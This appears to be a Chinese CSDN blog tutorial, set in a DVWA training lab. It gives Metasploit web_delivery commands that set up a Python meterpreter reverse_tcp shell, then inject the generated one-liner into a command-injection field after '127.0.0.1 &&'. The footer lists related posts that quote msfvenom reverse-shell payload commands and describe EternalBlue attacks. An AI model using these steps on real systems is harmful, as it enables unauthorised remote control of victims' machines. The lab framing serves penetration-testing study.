msf利用web_delivery模块 攻击windows实例

最新推荐文章于 2024-05-29 00:07:14 发布
最新推荐文章于 2024-05-29 00:07:14 发布
阅读量622 收藏 7
点赞数 1
文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cuteyann/article/details/130684070
版权

目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。

目标机系统:Windows10

1、打开终端,输入msfconsole

2、进去web_delivery模块,输入命令:

use exploit/multi/script/web_delivery

 3、输入:show targets,可以看到有多种脚本

 这里使用比较老的python做webshell就可以了,输入命令:set target 0

4、选择python的meterpreter

set payload python/meterpreter/reverse_tcp

5、设置攻击机(也就是本机)ip和端口

set lhost (本机ip地址)

set lpost (本机端口)

6、运行,输入命令:run

 红框里就是生成的命令,把它复制下来

7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交

127.0.0.1 && 生成的命令

 注意提交前设置靶场安全级别为LOW

(在目标机的cmd也可执行,前提是目标机已经安装了python)

8、查看session,然后连接,就可用对目标机进行操作啦

 

 

L_yann
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4678
win10系统攻击msf
通过msf渗透win10
qq_63651088的博客
03-22 1483
提前将kali设置成桥接模式,与win10在同一个网段下。将payload.exe文件发送至win10下。还有更多利用方式,可自行探索。
msfconsole攻击win10及简陋版
最新发布
极客云曦前端
05-29 276
该错误提示表明在Metasploit中执行“shell”命令需要加载“stdapi”扩展。这可能是由于Metasploit架缺少所需的依赖库或文件。接下来把木马复制到 /var/www/html下 开启 service apache2 start 即可下载,需要做免杀不然是保存不下来的。在win10 浏览器 输入192.168.1.19/muma.exe。输入 load stdapi 即可解决 需要在肉机 执行 生成的木马。kali 攻击机IP 192.168.1.19。再打开msfconsole。
Kali MSF攻击Win10
nlj1860453的博客
01-05 1198
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
渗透测试-window反弹shell
lza20001103的博客
05-11 4303
window反弹shell
MSF Exploit入侵电脑实践(Win7/Win10皆可)
xiaohujiang的博客
07-10 5845
msf exploit入侵电脑(Win7/Win10皆可) 需要的工具:msfvenom . msfconsole (kali里面有) msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o xss.exe msfven
msf5 自动攻击模块 db_autopwn
07-10
**msf5 自动攻击模块 db_autopwn 知识点详解** `db_autopwn`是Metasploit Framework(msf5)中的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块安全审计和渗透测试过程中扮演...
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题中的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
MFS(Mobile TV File System)和MSF(Media Service Format)都是为了适应移动环境下的数据传输和播放而创建的。MFS格式通常包含视频、音频和元数据,而MSF则可能涉及更复杂的服务信息,如电子节目指南(EPG)和数据...
msf.rar_Fighter_street fighter_动作游戏_街头霸王_街机
09-22
《街头霸王》是这一类型中的代表作,它定义了许多现代格斗游戏的规则和标准,比如能量槽系统(用于释放必杀技)和防御反击(在受到攻击的瞬间按下特定按钮进行反击)。 街机版本的《街头霸王》具有强烈的竞技氛围,...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 是 Metasploit 框架中的一个高级交互式后渗透工具,它允许渗透测试者在成功利用漏洞后与目标系统进行深度交互,执行多种高级操作。在网络安全和渗透测试领域,Meterpreter 是一种非常重要的工具,因为它...
记一次msf渗透win10
m0_46373658的博客
11-06 2440
KALI IP 192.168.186.141 WIN 10 192.168.186.131 生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe LHOST 本地的IP地址 LPORT 反向连接到主机的端口 打开 msfconsole use exploit/multi/handler 设置模块 set payload windows/meterp
MSF攻击web站点漏洞获取目标机器最高权限
世间繁华梦一出
12-22 2410
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点,使用无文件的方式攻击利用执行方法二:通过web站点,上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter 方法一:通过web站点,使用无文件的方式攻击利用执行 如何利用? 这里介绍一个msf的新模块web_delivery攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。 web_delivery的主要目的是快速和受害者
Win10-永恒之黑漏洞复现
网安小白的博客
09-19 2654
win10永恒之黑漏洞复现,图文详解
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3838
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
经典利用永恒之蓝漏洞对Windows操作系统进行攻击
qq_46202048的博客
11-25 1万+
利用永恒之蓝对Windows进行攻击 环境搭建:kali、Windows server 2008R2、Windows 7,其中Windows server 2008R2\WIN7为靶机。 首先简单介绍一下什么是永恒之蓝,永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2010
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell)
Mybatis接口Mapper内的方法为啥不能重载吗?
程序员麦冬的博客(公众号同名)
09-14 271
动态代理的功能:通过拦截器方法回调,对目标target方法进行增强。 言外之意就是为了增强目标target方法。上面这句话没错,但也不要认为它就是真理,殊不知,动态代理还有投鞭断流的霸权,连目标target都不要的科幻模式。 注:本文默认认为,读者对动态代理的原理是理解的,如果不明白target的含义,难以看懂本篇文章,建议先理解动态代理。 1. 自定义JDK动态代理之投鞭断流实现自动映射器Mapper 首先定义一个pojo。 public class User { private Integer id
Kali Linux-Metasploit入侵Windows10系统
热门推荐
冷色调的夏天的博客
08-01 3万+
Kali Linux-Metasploit入侵Windows10 写在前文 距离上一次写KALI黑客攻防的博文已是去年这个时候了 之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现 免责声明 切勿根据本文做违法之事,如做违法之事皆于博主本人无关! 实验环境 以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机 上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便 因此之后的截图是在一台物理机上的。 KALI:(攻
思考在什么场景下可利用MSF攻击android?
05-29
1. 利用 Android 设备上的漏洞进行远程代码执行攻击,可以通过 MSF 中的 exploit 模块实现。 2. 利用 Android 设备上的弱口令进行攻击,可以通过 MSF 中的 brute force 模块实现。 3. 利用 Android 设备上的反向...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值